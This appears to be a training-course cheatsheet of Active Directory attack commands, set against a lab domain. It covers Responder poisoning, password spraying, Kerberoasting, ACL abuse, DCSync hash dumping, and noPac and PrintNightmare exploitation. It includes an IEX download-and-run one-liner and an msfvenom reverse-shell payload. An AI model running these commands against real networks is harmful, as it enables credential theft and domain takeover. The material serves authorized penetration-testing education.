# Cheatsheet - Active Directory Enum

## Initial Enumeration

| Command | Description |
| --- | --- |
| `nslookup ns1.inlanefreight.com` | Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host. |
| `sudo tcpdump -i ens224` | Used to start capturing network packets on the network interface following the `-i` option from a Linux-based host. |
| `sudo responder -I ens224 -A` | Used to start responding to & analyzing LLMNR, NBT-NS and MDNS queries on the interface specified following the `-I` option and operating in Passive Analysis mode, which is activated using `-A`. Performed from a Linux-based host. |
| `fping -asgq 172.16.5.0/23` | Performs a ping sweep on the specified network segment from a Linux-based host. |
| `sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum` | Performs an nmap scan with OS detection, version detection, script scanning, and traceroute enabled (`-A`) based on a list of hosts (`hosts.txt`) specified in the file following `-iL`. Then outputs the scan results to the file specified after the `-oN` option. Performed from a Linux-based host. |
| `sudo git clone https://github.com/ropnop/kerbrute.git` | Uses git to clone the kerbrute tool from a Linux-based host. |
| `make help` | Used to list compiling options that are possible with make from a Linux-based host. |
| `sudo make all` | Used to compile a Kerbrute binary for multiple OS platforms and CPU architectures. |
| `./kerbrute_linux_amd64` | Used to test the chosen compiled Kerbrute binary from a Linux-based host. |
| `sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute` | Used to move the Kerbrute binary to a directory that can be set to be in a Linux user's path, making it easier to use the tool. |
| `./kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o kerb-results` | Runs the Kerbrute tool to discover usernames in the domain (`INLANEFREIGHT.LOCAL`) specified following the `-d` option and the associated domain controller specified following `--dc` using a wordlist, and outputs (`-o`) the results to a specified file. Performed from a Linux-based host. |

## LLMNR/NBT-NS Poisoning

| Command | Description |
| --- | --- |
| `responder -h` | Used to display the usage instructions and various options available in Responder from a Linux-based host. |
| `hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt` | Uses hashcat to crack NTLMv2 (`-m 5600`) hashes that were captured by Responder and saved in a file (`forend_ntlmv2`). The cracking is done based on a specified wordlist. |
| `Import-Module .\Inveigh.ps1` | Uses the `Import-Module` PowerShell cmdlet to import the Windows-based tool `Inveigh.ps1`. |
| `(Get-Command Invoke-Inveigh).Parameters` | Used to output many of the options & functionality available with `Invoke-Inveigh`. Performed from a Windows-based host. |
| `Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y` | Starts Inveigh on a Windows-based host with LLMNR & NBNS spoofing enabled and outputs the results to a file. |
| `.\Inveigh.exe` | Starts the C# implementation of Inveigh from a Windows-based host. |
| `$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get-ChildItem $regkey \|foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}` | PowerShell script used to disable NBT-NS on a Windows host. |

## Password Spraying & Password Policies

| Command | Description |
| --- | --- |
| `#!/bin/bash for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do echo $x; done` | Bash script used to generate 16,079,616 possible username combinations from a Linux-based host. |
| `crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol` | Uses CrackMapExec and valid credentials (`avazquez:Password123`) to enumerate the password policy (`--pass-pol`) from a Linux-based host. |
| `rpcclient -U "" -N 172.16.5.5` | Uses rpcclient to discover information about the domain through SMB NULL sessions. Performed from a Linux-based host. |
| `rpcclient $> querydominfo` | Uses rpcclient to enumerate the password policy in a target Windows domain from a Linux-based host. |
| `enum4linux -P 172.16.5.5` | Uses enum4linux to enumerate the password policy (`-P`) in a target Windows domain from a Linux-based host. |
| `enum4linux-ng -P 172.16.5.5 -oA ilfreight` | Uses enum4linux-ng to enumerate the password policy (`-P`) in a target Windows domain from a Linux-based host, then presents the output in YAML & JSON saved in a file following the `-oA` option. |
| `ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" \| grep -m 1 -B 10 pwdHistoryLength` | Uses ldapsearch to enumerate the password policy in a target Windows domain from a Linux-based host. |
| `net accounts` | Used to enumerate the password policy in a Windows domain from a Windows-based host. |
| `Import-Module .\PowerView.ps1` | Uses the `Import-Module` cmdlet to import the `PowerView.ps1` tool from a Windows-based host. |
| `Get-DomainPolicy` | Used to enumerate the password policy in a target Windows domain from a Windows-based host. |
| `enum4linux -U 172.16.5.5 \| grep "user:" \| cut -f2 -d"[" \| cut -f1 -d"]"` | Uses enum4linux to discover user accounts in a target Windows domain, then leverages grep and cut to filter the output to just display the user. Performed from a Linux-based host. |
| `rpcclient -U "" -N 172.16.5.5` then `rpcclient $> enumdomusers` | Uses rpcclient to discover user accounts in a target Windows domain from a Linux-based host. |
| `crackmapexec smb 172.16.5.5 --users` | Uses CrackMapExec to discover users (`--users`) in a target Windows domain from a Linux-based host. |
| `ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" \| grep sAMAccountName: \| cut -f2 -d" "` | Uses ldapsearch to discover users in a target Windows domain, then filters the output using grep to show only the `sAMAccountName`. Performed from a Linux-based host. |
| `./windapsearch.py --dc-ip 172.16.5.5 -u "" -U` | Uses the python tool `windapsearch.py` to discover users in a target Windows domain from a Linux-based host. |
| `for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 \| grep Authority; done` | Bash one-liner used to perform a password spraying attack using rpcclient and a list of users (`valid_users.txt`) from a Linux-based host. It also filters out failed attempts to make the output cleaner. |
| `kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1` | Uses kerbrute and a list of users (`valid_users.txt`) to perform a password spraying attack against a target Windows domain from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 \| grep +` | Uses CrackMapExec and a list of users (`valid_users.txt`) to perform a password spraying attack against a target Windows domain from a Linux-based host. It also filters out logon failures using grep. |
| `sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123` | Uses CrackMapExec to validate a set of credentials from a Linux-based host. |
| `sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf \| grep +` | Uses CrackMapExec and the `--local-auth` flag to ensure only one login attempt is performed from a Linux-based host. This is to ensure accounts are not locked out by enforced password policies. It also filters out logon failures using grep. |
| `Import-Module .\DomainPasswordSpray.ps1` | Used to import the PowerShell-based tool `DomainPasswordSpray.ps1` from a Windows-based host. |
| `Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue` | Performs a password spraying attack and outputs (`-OutFile`) the results to a specified file (`spray_success`) from a Windows-based host. |

## Enumerating Security Controls

| Command | Description |
| --- | --- |
| `Get-MpComputerStatus` | PowerShell cmdlet used to check the status of Windows Defender Antivirus from a Windows-based host. |
| `Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections` | PowerShell cmdlet used to view AppLocker policies from a Windows-based host. |
| `$ExecutionContext.SessionState.LanguageMode` | PowerShell used to discover the PowerShell Language Mode in use on a Windows-based host. Performed from a Windows-based host. |
| `Find-LAPSDelegatedGroups` | A LAPSToolkit function that discovers LAPS Delegated Groups from a Windows-based host. |
| `Find-AdmPwdExtendedRights` | A LAPSToolkit function that checks the rights on each computer with LAPS enabled for any groups with read access and users with `All Extended Rights`. Performed from a Windows-based host. |
| `Get-LAPSComputers` | A LAPSToolkit function that searches for computers that have LAPS enabled, discovers password expiration and can discover randomized passwords. Performed from a Windows-based host. |

## Credentialed Enumeration

| Command | Description |
| --- | --- |
| `xfreerdp /u:[email protected] /p:Klmcargo2 /v:172.16.5.25` | Connects to a Windows target using valid credentials. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users` | Authenticates with a Windows target over SMB using valid credentials and attempts to discover more users (`--users`) in a target Windows domain. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups` | Authenticates with a Windows target over SMB using valid credentials and attempts to discover groups (`--groups`) in a target Windows domain. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 --loggedon-users` | Authenticates with a Windows target over SMB using valid credentials and attempts to check for a list of logged on users (`--loggedon-users`) on the target Windows host. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares` | Authenticates with a Windows target over SMB using valid credentials and attempts to discover any SMB shares (`--shares`). Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share Dev-share` | Authenticates with a Windows target over SMB using valid credentials and utilizes the CrackMapExec module (`-M`) `spider_plus` to go through each readable share (`Dev-share`) and list all readable files. The results are output in JSON. Performed from a Linux-based host. |
| `smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5` | Enumerates the target Windows domain using valid credentials and lists shares & permissions available on each within the context of the valid credentials used and the target Windows host (`-H`). Performed from a Linux-based host. |
| `smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SYSVOL --dir-only` | Enumerates the target Windows domain using valid credentials and performs a recursive listing (`-R`) of the specified share (`SYSVOL`), and only outputs a list of directories (`--dir-only`) in the share. Performed from a Linux-based host. |
| `rpcclient $> queryuser 0x457` | Enumerates a target user account in a Windows domain using its relative identifier (`0x457`). Performed from a Linux-based host. |
| `rpcclient $> enumdomusers` | Discovers user accounts in a target Windows domain and their associated relative identifiers (RIDs). Performed from a Linux-based host. |
| `psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125` | Impacket tool used to connect to the CLI of a Windows target via the `ADMIN$` administrative share with valid credentials. Performed from a Linux-based host. |
| `wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5` | Impacket tool used to connect to the CLI of a Windows target via WMI with valid credentials. Performed from a Linux-based host. |
| `windapsearch.py -h` | Used to display the options and functionality of `windapsearch.py`. Performed from a Linux-based host. |
| `python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p transporter@4 --da` | Used to enumerate the Domain Admins group (`--da`) using a valid set of credentials on a target Windows domain. Performed from a Linux-based host. |
| `python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p transporter@4 -PU` | Used to perform a recursive search (`-PU`) for users with nested permissions using valid credentials. Performed from a Linux-based host. |
| `sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all` | Executes the python implementation of BloodHound (`bloodhound.py`) with valid credentials and specifies a name server (`-ns`) and target Windows domain (`inlanefreight.local`), as well as running all checks (`-c all`). Performed from a Linux-based host. |

## Enumeration by Living Off the Land

| Command | Description |
| --- | --- |
| `Get-Module` | PowerShell cmdlet used to list all available modules, their version and command options from a Windows-based host. |
| `Import-Module ActiveDirectory` | Loads the Active Directory PowerShell module from a Windows-based host. |
| `Get-ADDomain` | PowerShell cmdlet used to gather Windows domain information from a Windows-based host. |
| `Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName` | PowerShell cmdlet used to enumerate user accounts on a target Windows domain and filter by `ServicePrincipalName`. Performed from a Windows-based host. |
| `Get-ADTrust -Filter *` | PowerShell cmdlet used to enumerate any trust relationships in a target Windows domain and filters by any (`-Filter *`). Performed from a Windows-based host. |
| `Get-ADGroup -Filter * \| select name` | PowerShell cmdlet used to enumerate groups in a target Windows domain and filters by the name of the group (`select name`). Performed from a Windows-based host. |
| `Get-ADGroup -Identity "Backup Operators"` | PowerShell cmdlet used to search for a specific group (`-Identity "Backup Operators"`). Performed from a Windows-based host. |
| `Get-ADGroupMember -Identity "Backup Operators"` | PowerShell cmdlet used to discover the members of a specific group (`-Identity "Backup Operators"`). Performed from a Windows-based host. |
| `Export-PowerViewCSV` | PowerView script used to append results to a CSV file. Performed from a Windows-based host. |
| `ConvertTo-SID` | PowerView script used to convert a user or group name to its SID. Performed from a Windows-based host. |
| `Get-DomainSPNTicket` | PowerView script used to request the Kerberos ticket for a specified service principal name (SPN). Performed from a Windows-based host. |
| `Get-Domain` | PowerView script used to return the AD object for the current (or specified) domain. Performed from a Windows-based host. |
| `Get-DomainController` | PowerView script used to return a list of the target domain controllers for the specified target domain. Performed from a Windows-based host. |
| `Get-DomainUser` | PowerView script used to return all users or specific user objects in AD. Performed from a Windows-based host. |
| `Get-DomainComputer` | PowerView script used to return all computers or specific computer objects in AD. Performed from a Windows-based host. |
| `Get-DomainGroup` | PowerView script used to return all groups or specific group objects in AD. Performed from a Windows-based host. |
| `Get-DomainOU` | PowerView script used to search for all or specific OU objects in AD. Performed from a Windows-based host. |
| `Find-InterestingDomainAcl` | PowerView script used to find object ACLs in the domain with modification rights set to non-built-in objects. Performed from a Windows-based host. |
| `Get-DomainGroupMember` | PowerView script used to return the members of a specific domain group. Performed from a Windows-based host. |
| `Get-DomainFileServer` | PowerView script used to return a list of servers likely functioning as file servers. Performed from a Windows-based host. |
| `Get-DomainDFSShare` | PowerView script used to return a list of all distributed file systems for the current (or specified) domain. Performed from a Windows-based host. |
| `Get-DomainGPO` | PowerView script used to return all GPOs or specific GPO objects in AD. Performed from a Windows-based host. |
| `Get-DomainPolicy` | PowerView script used to return the default domain policy or the domain controller policy for the current domain. Performed from a Windows-based host. |
| `Get-NetLocalGroup` | PowerView script used to enumerate local groups on a local or remote machine. Performed from a Windows-based host. |
| `Get-NetLocalGroupMember` | PowerView script used to enumerate members of a specific local group. Performed from a Windows-based host. |
| `Get-NetShare` | PowerView script used to return a list of open shares on a local (or a remote) machine. Performed from a Windows-based host. |
| `Get-NetSession` | PowerView script used to return session information for the local (or a remote) machine. Performed from a Windows-based host. |
| `Test-AdminAccess` | PowerView script used to test if the current user has administrative access to the local (or a remote) machine. Performed from a Windows-based host. |
| `Find-DomainUserLocation` | PowerView script used to find machines where specific users are logged in. Performed from a Windows-based host. |
| `Find-DomainShare` | PowerView script used to find reachable shares on domain machines. Performed from a Windows-based host. |
| `Find-InterestingDomainShareFile` | PowerView script that searches for files matching specific criteria on readable shares in the domain. Performed from a Windows-based host. |
| `Find-LocalAdminAccess` | PowerView script used to find machines on the local domain where the current user has local administrator access. Performed from a Windows-based host. |
| `Get-DomainTrust` | PowerView script that returns domain trusts for the current domain or a specified domain. Performed from a Windows-based host. |
| `Get-ForestTrust` | PowerView script that returns all forest trusts for the current forest or a specified forest. Performed from a Windows-based host. |
| `Get-DomainForeignUser` | PowerView script that enumerates users who are in groups outside of the user's domain. Performed from a Windows-based host. |
| `Get-DomainForeignGroupMember` | PowerView script that enumerates groups with users outside of the group's domain and returns each foreign member. Performed from a Windows-based host. |
| `Get-DomainTrustMapping` | PowerView script that enumerates all trusts for the current domain and any others seen. Performed from a Windows-based host. |
| `Get-DomainGroupMember -Identity "Domain Admins" -Recurse` | PowerView script used to list all the members of a target group (`"Domain Admins"`) through the use of the recurse option (`-Recurse`). Performed from a Windows-based host. |
| `Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName` | PowerView script used to find users on the target Windows domain that have a Service Principal Name set. Performed from a Windows-based host. |
| `.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data` | Runs a tool called Snaffler against a target Windows domain that finds various kinds of data in shares that the compromised account has access to. Performed from a Windows-based host. |

## Transferring Files

| Command | Description |
| --- | --- |
| `sudo python3 -m http.server 8001` | Starts a python web server for quick hosting of files. Performed from a Linux-based host. |
| `"IEX(New-Object Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')"` | PowerShell one-liner used to download a file from a web server. Performed from a Windows-based host. |
| `impacket-smbserver -ip 172.16.5.x -smb2support -username user -password password shared /home/administrator/Downloads/` | Starts an impacket SMB server for quick hosting of a file. Performed from a Windows-based host. |

## Kerberoasting

| Command | Description |
| --- | --- |
| `sudo python3 -m pip install .` | Used to install Impacket from inside the directory that gets cloned to the attack host. Performed from a Linux-based host. |
| `GetUserSPNs.py -h` | Impacket tool used to display the options and functionality of `GetUserSPNs.py` from a Linux-based host. |
| `GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday` | Impacket tool used to get a list of SPNs on the target Windows domain from a Linux-based host. |
| `GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request` | Impacket tool used to download/request (`-request`) all TGS tickets for offline processing from a Linux-based host. |
| `GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev` | Impacket tool used to download/request (`-request-user`) a TGS ticket for a specific user account (`sqldev`) from a Linux-based host. |
| `GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev -outputfile sqldev_tgs` | Impacket tool used to download/request a TGS ticket for a specific user account and write the ticket to a file (`-outputfile sqldev_tgs`) from a Linux-based host. |
| `hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt --force` | Attempts to crack the Kerberos (`-m 13100`) ticket hash (`sqldev_tgs`) using hashcat and a wordlist (`rockyou.txt`) from a Linux-based host. |
| `setspn.exe -Q */*` | Used to enumerate SPNs in a target Windows domain from a Windows-based host. |
| `Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"` | PowerShell script used to download/request the TGS ticket of a specific user from a Windows-based host. |
| `setspn.exe -T INLANEFREIGHT.LOCAL -Q */* \| Select-String '^CN' -Context 0,1 \| % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }` | Used to download/request all TGS tickets from a Windows-based host. |
| `mimikatz # base64 /out:true` | Mimikatz command that ensures TGS tickets are extracted in base64 format from a Windows-based host. |
| `kerberos::list /export` | Mimikatz command used to extract the TGS tickets from a Windows-based host. |
| `echo "<base64 blob>" \| tr -d \\n` | Used to prepare the base64-formatted TGS ticket for cracking from a Linux-based host. |
| `cat encoded_file \| base64 -d > sqldev.kirbi` | Used to base64-decode a file (`encoded_file`) and write the result to a `.kirbi` file (`base64 -d > sqldev.kirbi`) from a Linux-based host. |
| `python2.7 kirbi2john.py sqldev.kirbi` | Used to extract the Kerberos ticket hash. This also creates a file called `crack_file`. Performed from a Linux-based host. |
| `sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat` | Used to modify the `crack_file` for Hashcat from a Linux-based host. |
| `cat sqldev_tgs_hashcat` | Used to view the prepared hash from a Linux-based host. |
| `hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt` | Used to crack the prepared Kerberos ticket hash (`sqldev_tgs_hashcat`) using a wordlist (`rockyou.txt`) from a Linux-based host. |
| `Import-Module .\PowerView.ps1 Get-DomainUser * -spn \| select samaccountname` | Uses the PowerView tool to extract TGS tickets. Performed from a Windows-based host. |
| `Get-DomainUser -Identity sqldev \| Get-DomainSPNTicket -Format Hashcat` | PowerView tool used to download/request the TGS ticket of a specific user (`sqldev`) and automatically format it for Hashcat from a Windows-based host. |
| `Get-DomainUser * -SPN \| Get-DomainSPNTicket -Format Hashcat \| Export-Csv .\ilfreight_tgs.csv -NoTypeInformation` | Exports all TGS tickets to a `.csv` file (`ilfreight_tgs.csv`) from a Windows-based host. |
| `cat .\ilfreight_tgs.csv` | Used to view the contents of the `.csv` file from a Windows-based host. |
| `.\Rubeus.exe` | Used to view the options and functionality possible with the tool Rubeus. Performed from a Windows-based host. |
| `.\Rubeus.exe kerberoast /stats` | Used to check the kerberoast stats (`/stats`) within the target Windows domain from a Windows-based host. |
| `.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap` | Used to request/download TGS tickets for accounts with the admin count set to 1, then formats the output in an easy to view & crack manner (`/nowrap`). Performed from a Windows-based host. |
| `.\Rubeus.exe kerberoast /user:testspn /nowrap` | Used to request/download a TGS ticket for a specific user (`/user:testspn`), then formats the output in an easy to view & crack manner (`/nowrap`). Performed from a Windows-based host. |
| `Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes` | PowerView tool used to check the `msDS-SupportedEncryptionTypes` attribute associated with a specific user account (`testspn`). Performed from a Windows-based host. |
| `hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt` | Used to attempt to crack the ticket hash using a wordlist (`rockyou.txt`) from a Linux-based host. |

## ACL Enumeration & Tactics

| Command | Description |
| --- | --- |
| `Find-InterestingDomainAcl` | PowerView tool used to find object ACLs in the target Windows domain with modification rights set to non-built-in objects from a Windows-based host. |
| `Import-Module .\PowerView.ps1 $sid = Convert-NameToSid wley` | Used to import PowerView and retrieve the SID of a specific user account (`wley`) from a Windows-based host. |
| `Get-DomainObjectACL -Identity * \| ? {$_.SecurityIdentifier -eq $sid}` | Used to find all Windows domain objects that the user has rights over by mapping the user's SID to the `SecurityIdentifier` property from a Windows-based host. |
| `$guid= "00299570-246d-11d0-a768-00aa006e0529" Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * \| Select Name,DisplayName,DistinguishedName,rightsGuid \| ?{$_.rightsGuid -eq $guid} \| fl` | Used to perform a reverse search & map to a GUID value from a Windows-based host. |
| `Get-DomainObjectACL -ResolveGUIDs -Identity * \| ? {$_.SecurityIdentifier -eq $sid}` | Used to discover a domain object's ACL by performing a search based on GUIDs (`-ResolveGUIDs`) from a Windows-based host. |
| `Get-ADUser -Filter * \| Select-Object -ExpandProperty SamAccountName > ad_users.txt` | Used to discover a group of user accounts in a target Windows domain and add the output to a text file (`ad_users.txt`) from a Windows-based host. |
| `foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" \| Select-Object Path -ExpandProperty Access \| Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}` | A foreach loop used to retrieve ACL information for each domain user in a target Windows domain by feeding each line of a text file (`ad_users.txt`) to the `Get-ADUser` cmdlet, then enumerates the access rights of those users. Performed from a Windows-based host. |
| `$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)` | Used to create a PSCredential object from a Windows-based host. |
| `$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force` | Used to create a SecureString object from a Windows-based host. |
| `Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose` | PowerView tool used to change the password of a specific user (`damundsen`) on a target Windows domain from a Windows-based host. |
| `Get-ADGroup -Identity "Help Desk Level 1" -Properties * \| Select -ExpandProperty Members` | PowerView tool used to view the members of a target security group (`Help Desk Level 1`) from a Windows-based host. |
| `Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose` | PowerView tool used to add a specific user (`damundsen`) to a specific security group (`Help Desk Level 1`) in a target Windows domain from a Windows-based host. |
| `Get-DomainGroupMember -Identity "Help Desk Level 1" \| Select MemberName` | PowerView tool used to view the members of a specific security group (`Help Desk Level 1`) and output only the username of each member (`Select MemberName`) of the group from a Windows-based host. |
| `Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose` | PowerView tool used to create a fake Service Principal Name for a specific user (`adunn`) from a Windows-based host. |
| `Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose` | PowerView tool used to remove the fake Service Principal Name created during the attack from a Windows-based host. |
| `Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose` | PowerView tool used to remove a specific user (`damundsen`) from a specific security group (`Help Desk Level 1`) from a Windows-based host. |
| `ConvertFrom-SddlString` | PowerShell cmdlet used to convert an SDDL string into a readable format. Performed from a Windows-based host. |

## DCSync

| Command | Description |
| --- | --- |
| `Get-DomainUser -Identity adunn \| select samaccountname,objectsid,memberof,useraccountcontrol \|fl` | PowerView tool used to view the group membership of a specific user (`adunn`) in a target Windows domain. Performed from a Windows-based host. |
| `$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs \| ? { ($_.ObjectAceType -match 'Replication-Get')} \| ?{$_.SecurityIdentifier -match $sid} \| select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType \| fl` | Used to create a variable called `$sid` that is set equal to the SID of a user account. Then uses the PowerView tool `Get-ObjectAcl` to check a specific user's replication rights. Performed from a Windows-based host. |
| `secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/[email protected] -use-vss` | Impacket tool used to extract NTLM hashes from the NTDS.dit file hosted on a target Domain Controller (`172.16.5.5`) and save the extracted hashes to a file (`inlanefreight_hashes`). Performed from a Linux-based host. |
| `mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator` | Uses Mimikatz to perform a DCSync attack from a Windows-based host. |

## Privileged Access

| Command | Description |
| --- | --- |
| `Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"` | PowerView-based tool used to enumerate the Remote Desktop Users group on a Windows target (`-ComputerName ACADEMY-EA-MS01`) from a Windows-based host. |
| `Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"` | PowerView-based tool used to enumerate the Remote Management Users group on a Windows target (`-ComputerName ACADEMY-EA-MS01`) from a Windows-based host. |
| `$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force` | Creates a variable (`$password`) set equal to the password (`Klmcargo2`) of a user from a Windows-based host. |
| `$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)` | Creates a variable (`$cred`) set equal to the username (`forend`) and password (`$password`) of a target domain account from a Windows-based host. |
| `Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred` | Uses the PowerShell cmdlet `Enter-PSSession` to establish a PowerShell session with a target over the network (`-ComputerName ACADEMY-EA-DB01`) from a Windows-based host. Authenticates using the credentials made in the two commands shown prior (`$cred` & `$password`). |
| `evil-winrm -i 10.129.201.234 -u forend` | Used to establish a PowerShell session with a Windows target from a Linux-based host using WinRM. |
| `Import-Module .\PowerUpSQL.ps1` | Used to import the PowerUpSQL tool. |
| `Get-SQLInstanceDomain` | PowerUpSQL tool used to enumerate SQL server instances from a Windows-based host. |
| `Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'` | PowerUpSQL tool used to connect to a SQL server and query the version (`-query 'Select @@version'`) from a Windows-based host. |
| `mssqlclient.py` | Impacket tool used to display the functionality and options provided with `mssqlclient.py` from a Linux-based host. |
| `mssqlclient.py INLANEFREIGHT/[email protected] -windows-auth` | Impacket tool used to connect to an MSSQL server from a Linux-based host. |
| `SQL> help` | Used to display `mssqlclient.py` options once connected to an MSSQL server. |
| `SQL> enable_xp_cmdshell` | Used to enable the `xp_cmdshell` stored procedure, which allows for executing OS commands via the database, from a Linux-based host. |
| `xp_cmdshell whoami /priv` | Used to enumerate rights on a system using `xp_cmdshell`. |

NoPac
| Command | Description |
| --- | --- |
| `sudo git clone https://github.com/Ridter/noPac.git` | Used to clone a noPac exploit using git. Performed from a Linux-based host. |
| `sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap` | Runs scanner.py to check if a target system is vulnerable to noPac / Sam_The_Admin from a Linux-based host. |
| `sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap` | Used to exploit the noPac / Sam_The_Admin vulnerability and gain a SYSTEM shell ( `-shell` ). Performed from a Linux-based host. |
| `sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator` | Used to exploit the noPac / Sam_The_Admin vulnerability and perform a DCSync attack against the built-in Administrator account on a Domain Controller from a Linux-based host. |

PrintNightmare
| Command | Description |
| --- | --- |
| `git clone https://github.com/cube0x0/CVE-2021-1675.git` | Used to clone a PrintNightmare exploit using git from a Linux-based host. |
| `pip3 uninstall impacket ; git clone https://github.com/cube0x0/impacket ; cd impacket ; python3 ./setup.py install` | Used to ensure the exploit author's ( `cube0x0` ) version of Impacket is installed. This also uninstalls any previous Impacket version on a Linux-based host. |
| `rpcdump.py @172.16.5.5 \| egrep 'MS-RPRN\|MS-PAR'` | Used to check if a Windows target has MS-PAR & MS-RPRN exposed from a Linux-based host. |
| `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll` | Used to generate a DLL payload to be used by the exploit to gain a shell session. Performed from a Windows-based host. |
| `sudo smbserver.py -smb2support CompData /path/to/backupscript.dll` | Used to create an SMB server and host a shared folder ( `CompData` ) at the specified location on the local Linux host. This can be used to host the DLL payload that the exploit will attempt to download to the target. Performed from a Linux-based host. |
